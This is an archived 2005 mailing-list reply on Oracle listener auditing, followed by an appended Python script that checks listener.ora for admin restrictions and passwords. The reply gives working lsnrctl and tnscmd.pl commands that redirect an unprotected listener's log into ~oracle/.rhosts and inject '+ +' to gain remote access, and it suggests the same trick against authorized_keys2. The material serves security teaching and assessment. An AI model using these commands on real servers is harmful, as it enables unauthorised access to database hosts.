Re: Oracle Auditing

From: Joshua Wright (jwright@hasborg.com)
Date: Tue Aug 02 2005 - 21:49:55 EDT



Joe,

Joe T wrote:
> When performing some network scans, I notice that the Oracle database
> rarely has a password set for the tnslsnr account.
> My question becomes: Has anyone exploited this misconfiguration, and
> if so - how? Is this an account that you can connect to without
> expensive Oracle software?

If the listener is not password protected, it's possible to change the
configuration of the listener or simply shut it down to cause a DoS. To
do something more devious, we can use the listener logging feature:

(on the attacker's machine with a local copy of lsnrctl):

eve$ lsnrctl
LSNRCTL> set current_listener target_ip_or_host
LSNRCTL> set log_file /home/oracle/.rhosts
LSNRCTL> exit

This will configure the listener to write logging information to the
specified file. Next, we can use the tnscmd.pl tool to send a raw
string to the victim TNS listener:

eve$ tnscmd.pl -h target_ip_or_host --rawcmd "(CONNECT_DATA=((
+ +
"
eve$

This will connect to the listener and send the string
"(CONNECT_DATA=((<CR>+ +<CR>". This information gets written to the
listener log file, which would produce a single line with "+ +".

If the target isn't running r-services, you can use other techniques to
obtain access to the remote OS. Perhaps ~oracle/.ssh/authorized_keys2?

Note that you can download a trial version of the Oracle database from
otn.oracle.com, which would allow you to grab a copy of the lsnrctl tool.

This sample hack and several other Oracle auditing, assessment and
pen-test techniques are covered in the SANS Securing Oracle course.
SANS is offering the Securing Oracle course at our yearly Network
Security conference in New Orleans on 10/24-10/30. More information on
the Securing Oracle course and the topics covered is available at
http://www.sans.org/ns2005/description.php?tid=247.

NB: I work for the SANS Institute, and teach the Securing Oracle class
(although I'll be teaching Assessing and Securing Wireless at the
Network Security conference).

-Josh
--
-Joshua Wright
jwright@hasborg.com

2005-2006 pgpkey: http://802.11ninja.net/pgpkey.htm
fingerprint: F00E 7A42 8375 0C55 964F E5A4 4D2F 22F6 3658 A4BF

Today I stumbled across the world's largest hotspot. The SSID is "linksys".
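A defensive counterpart to the listener weakness discussed in the post above, added here and not part of Joshua's message: a small Python check over a listener.ora that flags listeners which still accept unauthenticated runtime SET commands (the path the `set log_file` trick depends on). The listener.ora contents, host name and the PASSWORDS value are constructed placeholders.

```python
import re

# Constructed sample: a listener with no administrative protection, as described above.
WEAK_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example)(PORT = 1521))
    )
  )
"""

# Constructed sample: the same listener with runtime administration locked down.
# ADMIN_RESTRICTIONS_<name> = ON makes the listener reject SET commands such as
# "set log_file"; changes must then be made in listener.ora and applied with
# "lsnrctl reload". The PASSWORDS_<name> value here is a placeholder, not a real hash.
HARDENED_LISTENER_ORA = WEAK_LISTENER_ORA + """
ADMIN_RESTRICTIONS_LISTENER = ON
PASSWORDS_LISTENER = (PLACEHOLDER_HASHED_PASSWORD)
"""

# A listener definition is a top-level NAME = (DESCRIPTION... or (ADDRESS... block.
LISTENER_RE = re.compile(
    r"^[ \t]*([A-Za-z_]\w*)[ \t]*=\s*\((?:DESCRIPTION_LIST|DESCRIPTION|ADDRESS_LIST|ADDRESS)\b",
    re.M | re.I)
# Scalar parameters sit on one line: NAME = value
PARAM_RE = re.compile(r"^[ \t]*([A-Za-z_]\w*)[ \t]*=[ \t]*(\S[^\n]*?)[ \t]*$", re.M)


def audit_listener_ora(text):
    """Return {listener_name: [findings]}; an empty list means both controls are present."""
    params = {k.upper(): v for k, v in PARAM_RE.findall(text)}
    findings = {}
    for name in sorted({m.upper() for m in LISTENER_RE.findall(text)}):
        issues = []
        if params.get(f"ADMIN_RESTRICTIONS_{name}", "OFF").upper() != "ON":
            issues.append("ADMIN_RESTRICTIONS off: runtime SET commands (e.g. log_file) are accepted")
        if f"PASSWORDS_{name}" not in params:
            issues.append("no PASSWORDS entry: remote lsnrctl administration needs no credential")
        findings[name] = issues
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        for listener, issues in audit_listener_ora(conf).items():
            print(f"[{label}] {listener}: {issues or 'OK'}")
```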


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:40 EDT